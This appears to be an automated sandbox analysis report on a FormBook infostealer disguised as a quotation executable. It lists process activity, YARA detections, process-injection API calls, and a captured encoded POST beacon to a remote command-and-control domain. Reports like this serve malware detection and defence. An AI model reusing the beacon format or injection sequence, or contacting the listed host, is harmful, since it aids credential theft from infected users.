                                        Date: Tue, 27 Aug 2024 06:45:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        x-litespeed-tag: 8cf_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNbyGI8aBV%2FoiBG1%2FYmu%2FFh4wj92U%2F2kEEnSmUcMBk3MU4NB3tjPSfmtv2pRWV6GTF5fDi8po4psmO5JYOin2VLQ9turi9%2F78745SUqnW5Mv3P66lyV5GOgQZefAJdZOqjeq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8b9a18c3db1742b9-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        54 | 192.168.2.6 | 51252 | 172.67.220.161 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:45:07.410522938 CEST | 855 | OUT | POST /q1r7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cchelvn.shop
                                        Origin: http://www.cchelvn.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.cchelvn.shop/q1r7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=6Bq+v0eApTmOCThZ+2lJ4TJXvlFeX+G/mcrjDjim+onWp68kDWDKiHEbdr/TtRA9h8KkwP2NsUW9spBb/b1tQRoULISDMd84wvHJ+WBAQRpAtDC0SydquUafMGEDBCilqlonFuUBjmuR4od0AsQrqhDgarminNc9NICYvtgSYA0TeBmjl0Pi4mnjc62tG3BpZ5pXt+bLQ5Ovk/A9c3x4Y2Yd7MFMlVvDNw==
                                        Aug 27, 2024 08:45:08.777610064 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:45:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        x-litespeed-tag: 8cf_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VGqyRRTLYnqolhzsnwW0VIUwivqNj12tkyl1zkuVCvFLGzfePq7YsWD4MOmDhvhmXA8sHo3sgatSIVIwmmATywi4rMGdmCil3BruBclzBd6xJgmwEuUx8aqJmDw3D8VqfTVA"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8b9a18d3cee20f79-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400



                                        Target ID:0
                                        Start time:02:41:01
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x990000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:02:41:02
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x150000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:02:41:02
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x450000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:02:41:30
                                        Start date:27/08/2024
                                        Path:C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe"
                                        Imagebase:0xf90000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:9
                                        Start time:02:41:31
                                        Start date:27/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\PING.EXE"
                                        Imagebase:0x7c0000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:12
                                        Start time:02:41:56
                                        Start date:27/08/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff728280000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:10.3%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:2.1%
                                          Total number of Nodes:290
                                          Total number of Limit Nodes:18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc128a674d963ceb069836aece66043671aa1896e25338f5b1e9196f0cfd0544
                                          • Instruction ID: 665fb9e23e34b48e323636044899d4689d4eac9e8c8c5783bdc55d80adeea58f
                                          • Opcode Fuzzy Hash: dc128a674d963ceb069836aece66043671aa1896e25338f5b1e9196f0cfd0544
                                          • Instruction Fuzzy Hash: 0142F678B10600CFDB29AB78C4586AA7BFAFF89305F10446DE607DB764DEB69841DB00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 534df76e385a5c87a2d42200b66363de56bcc1fd2848ece039ced4cce3fb964f
                                          • Instruction ID: 183a894cdb1a81566381a1a281c35247c7a0b8cdad0aa42d4d046cffd8931abb
                                          • Opcode Fuzzy Hash: 534df76e385a5c87a2d42200b66363de56bcc1fd2848ece039ced4cce3fb964f
                                          • Instruction Fuzzy Hash: 6422F330600501CFCB4ADF69D584A69B7A2FF95308B65CAADD4098B2A6D737EC53CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94934b6d193c6f272f74cad34060770293067d4a2c87caec79ae3f709f0d2020
                                          • Instruction ID: 07f53ff3b52e7a7dfe4eb9e64076609e30b395e46b6e5d059eb4c84fc218adec
                                          • Opcode Fuzzy Hash: 94934b6d193c6f272f74cad34060770293067d4a2c87caec79ae3f709f0d2020
                                          • Instruction Fuzzy Hash: B3F1DF34600501CFCB4ADF3AD584A69B762FF95308B65CAADC0098B2A6D737E853CF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b33182e946dd44d58d648782bee999ade7460a34adcd83e145ab43b426f134e2
                                          • Instruction ID: 6aa3d96b8d8906f98d54c4ac0e0544a78a4c65110fdc8a2c2f513bff4f56d4c5
                                          • Opcode Fuzzy Hash: b33182e946dd44d58d648782bee999ade7460a34adcd83e145ab43b426f134e2
                                          • Instruction Fuzzy Hash: 92416CF1F156158BEB0C8AB959511BFFBBBABC9340F10D427D60AFB691CA318D018B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d853f4a6b19d40c128b9bd1fb3a8b879ec0b784cdf182e78e8d8315417f7a342
                                          • Instruction ID: dd3e690a4b2deec6cb101b5b27b53458df9ad3e9fc9e997c305d41588bed87ef
                                          • Opcode Fuzzy Hash: d853f4a6b19d40c128b9bd1fb3a8b879ec0b784cdf182e78e8d8315417f7a342
                                          • Instruction Fuzzy Hash: 68414AB1F156148BE70C8AB999511BFF6BAEBC9340F10D427D61AFB681CA31CD018B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45f7192b20ab8ab5274acc7415009fcb5c406679c16621668da901cfb1004a5
                                          • Instruction ID: 30fcec741d857eee95dc536dd8f28ca80199e3f67e388d188580de25243c3b8f
                                          • Opcode Fuzzy Hash: d45f7192b20ab8ab5274acc7415009fcb5c406679c16621668da901cfb1004a5
                                          • Instruction Fuzzy Hash: 212107B1D056999BEB19CFA7C8043DEFFB6AFC9300F08C06AC409A6265DBB409468F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 490796893e388ec2e7a1e2666774986153944540e56e857e9a1d4110357f88eb
                                          • Instruction ID: 677c5cfdf21461ee83683edecc74d79a39520602cfe107fc103af97b8aba1381
                                          • Opcode Fuzzy Hash: 490796893e388ec2e7a1e2666774986153944540e56e857e9a1d4110357f88eb
                                          • Instruction Fuzzy Hash: 7121E4B1D006589BEB18CFABD8097DEFAF7AFC8340F04C06AD50966264DBB409468F90

                                          Control-flow Graph

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: eb8ffb4070dac514b3fef37bb4939df17d3166096980bee21f9738c7708c29f5
                                          • Instruction ID: 938bf27364e26f3d5e57a0748ed4d9e5d9b3041481f983836e7fa094ae9e4184
                                          • Opcode Fuzzy Hash: eb8ffb4070dac514b3fef37bb4939df17d3166096980bee21f9738c7708c29f5
                                          • Instruction Fuzzy Hash: D6D1AEB1710705CFEB15DB76C4A4BAEB7F6AF8A340F1044AED2499B2A0CB35E905CB51

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F9F0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: ea1e8ee921683ae9e5717adb7947e8ec394367c256825cb7b50f313971186495
                                          • Instruction ID: f878f4adb55ff480191265acf6baf0b52b28bfbbe0539f786610b35e7cf42e83
                                          • Opcode Fuzzy Hash: ea1e8ee921683ae9e5717adb7947e8ec394367c256825cb7b50f313971186495
                                          • Instruction Fuzzy Hash: 4AA15BB1D0031ADFEB10CF69C841BDEBBB2AF48314F14816AE908E7280DB759985CF91

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F9F0E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 722a99f5776be5cdc76636c8568dd41e76328f2f70ec9d8bd8b70b64bb1635c2
                                          • Instruction ID: 8d09823a3248edbb1903c50f08175696980e7a489452266c12f71441904ceffd
                                          • Opcode Fuzzy Hash: 722a99f5776be5cdc76636c8568dd41e76328f2f70ec9d8bd8b70b64bb1635c2
                                          • Instruction Fuzzy Hash: FD915BB1D0031ADFEB10DF69C841BDEBBB2AF48314F14816AE908E7280DB759985CF91

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053835E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 63a034b8beac38868a0cce494a5bbbfc982522955f6afdcdb71ac196ceeefe7e
                                          • Instruction ID: 2df405fa4b124412e3b2dbd7c3edde2ab9efa86fb18849acd7b3492a801a16c6
                                          • Opcode Fuzzy Hash: 63a034b8beac38868a0cce494a5bbbfc982522955f6afdcdb71ac196ceeefe7e
                                          • Instruction Fuzzy Hash: EA51E0B1D00349DFDB14DF9AC884ADEBBB5BF48710F20852AE819AB210D7B4A945CF90

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053835E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 109d00c5c15e016506336ffb293b1ab6df378f824bed172ad2519976843bffdd
                                          • Instruction ID: 6df5f1ea9f72e2bda7ddfb0c12ad456ccaa0ad60581701156a723e17af65cc5e
                                          • Opcode Fuzzy Hash: 109d00c5c15e016506336ffb293b1ab6df378f824bed172ad2519976843bffdd
                                          • Instruction Fuzzy Hash: DD41BEB1D00349DFDB14CF9AC884ADEBBB5BF48710F24852AE819AB210D7B5A945CF90

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 01405CE9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 990f381faf64a0369a425f1958b4b5f60e91b6fb4435cd70486eda3378293175
                                          • Instruction ID: bec437c7cf7234f50225c44f1e527f4dd7616d78fc0ade42960fc873ccedb777
                                          • Opcode Fuzzy Hash: 990f381faf64a0369a425f1958b4b5f60e91b6fb4435cd70486eda3378293175
                                          • Instruction Fuzzy Hash: 7941C3B1C00719CBDB15CFAAC948BDEBBB5FF45704F20816AD408AB251DB756946CF90

                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05385B61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: e67b02736cbd71fa546733568ec42e4b4f65a26710c127b7ba2dbd32754b4ce2
                                          • Instruction ID: b00ee6c766ebb11edf74a700d0e2f6423b909af94c4427424dd8832f5b66f08c
                                          • Opcode Fuzzy Hash: e67b02736cbd71fa546733568ec42e4b4f65a26710c127b7ba2dbd32754b4ce2
                                          • Instruction Fuzzy Hash: 3E412CB9900305DFCB19DF99C488BAABBF5FF89314F248459D519A7321D774A841CFA0

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 01405CE9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: c7753965ace5e4d31d5c19567cdd4ae74352f9eda7852c3d87c461a0e184ea39
                                          • Instruction ID: 5cfbe48f4241b68d31c2ea63e66d5c316a877fe53f4264749e8bd068ec184f05
                                          • Opcode Fuzzy Hash: c7753965ace5e4d31d5c19567cdd4ae74352f9eda7852c3d87c461a0e184ea39
                                          • Instruction Fuzzy Hash: C441E270C0071DCBEB25CFAAC948B9EBBB5FF48704F20816AD408AB251DB756946CF90

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F9AE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 25cc14613bfcc162f3ac75e0412be40063d295814c144e802e99ff276b85600b
                                          • Instruction ID: 010cbd51b1a8ba2993e476077d70ebf53e592c0e0e2289147263d2e4343ebc89
                                          • Opcode Fuzzy Hash: 25cc14613bfcc162f3ac75e0412be40063d295814c144e802e99ff276b85600b
                                          • Instruction Fuzzy Hash: 792139B19003499FDF10CFAAC881BDEBBF4FF48310F108429E958A7241D778A550CB60

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F9AE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: e305c6e43acd4659be566579b771bf72fd881ad32db6ebe30c039a51f1a804bb
                                          • Instruction ID: 3afff3f86c768e4a32effc6ca4fbad5af6b497a619ff0a7d4f6cf044c3d20e9f
                                          • Opcode Fuzzy Hash: e305c6e43acd4659be566579b771bf72fd881ad32db6ebe30c039a51f1a804bb
                                          • Instruction Fuzzy Hash: AB2117B59003499FDF10DFAAC881BDEBBF5BF48310F108429EA59A7240D778A550CBA4

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F94FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: f4b94cbb1cbc83b694269dcb47d40252aa9051e71ff0498d214ceb84cdf063bf
                                          • Instruction ID: c1413ef9b917386f639c7fe5a344e214094126f79e9b2e56e7e9ee6b210e4154
                                          • Opcode Fuzzy Hash: f4b94cbb1cbc83b694269dcb47d40252aa9051e71ff0498d214ceb84cdf063bf
                                          • Instruction Fuzzy Hash: 76216AB19003099FEB10CFAAC4857EEBBF4EF88324F14842AD559A7241D778A545CFA0

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0140EE6E,?,?,?,?,?), ref: 0140EF2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 6b45d3265fe7aada55adb5ca3b06a823ca5cd31ac8676005eb085fdb4277b89a
                                          • Instruction ID: e152d250697036eb61a3a2e582f80466faaf2e3d0ee66620b4255b80512d3b1e
                                          • Opcode Fuzzy Hash: 6b45d3265fe7aada55adb5ca3b06a823ca5cd31ac8676005eb085fdb4277b89a
                                          • Instruction Fuzzy Hash: 4821E5B5900249EFDB10CF9AD584ADEBFF4EB48320F14841AE914B3350D374A950CFA4
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F9BC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: e98732e285fc804e299be98d4db5bdb4bf4c07e2906d390095c4b0789e4c89cb
                                          • Instruction ID: ad9db758ed151c5d341ae5ae74c5f2a0b13fc04124e8e2444d143a74bb56f35c
                                          • Opcode Fuzzy Hash: e98732e285fc804e299be98d4db5bdb4bf4c07e2906d390095c4b0789e4c89cb
                                          • Instruction Fuzzy Hash: 9E2107B19003499FDB10CFAAC881BDEBBF5FF48310F10882AE559A7240D774A950CBA5
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F94FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 0277e7edaf4ba91adf3d73db3288d286593c0ab2ec060db5d5f6bd3035673173
                                          • Instruction ID: 0cfd700bb157963f280a0b6beae7fa91121a4d26fcab4dd7eab5606270951cd0
                                          • Opcode Fuzzy Hash: 0277e7edaf4ba91adf3d73db3288d286593c0ab2ec060db5d5f6bd3035673173
                                          • Instruction Fuzzy Hash: 5F214CB19003099FDB10DFAAC4857EEBBF4EF88314F14842AD519A7240D778A544CFA5
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F9BC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
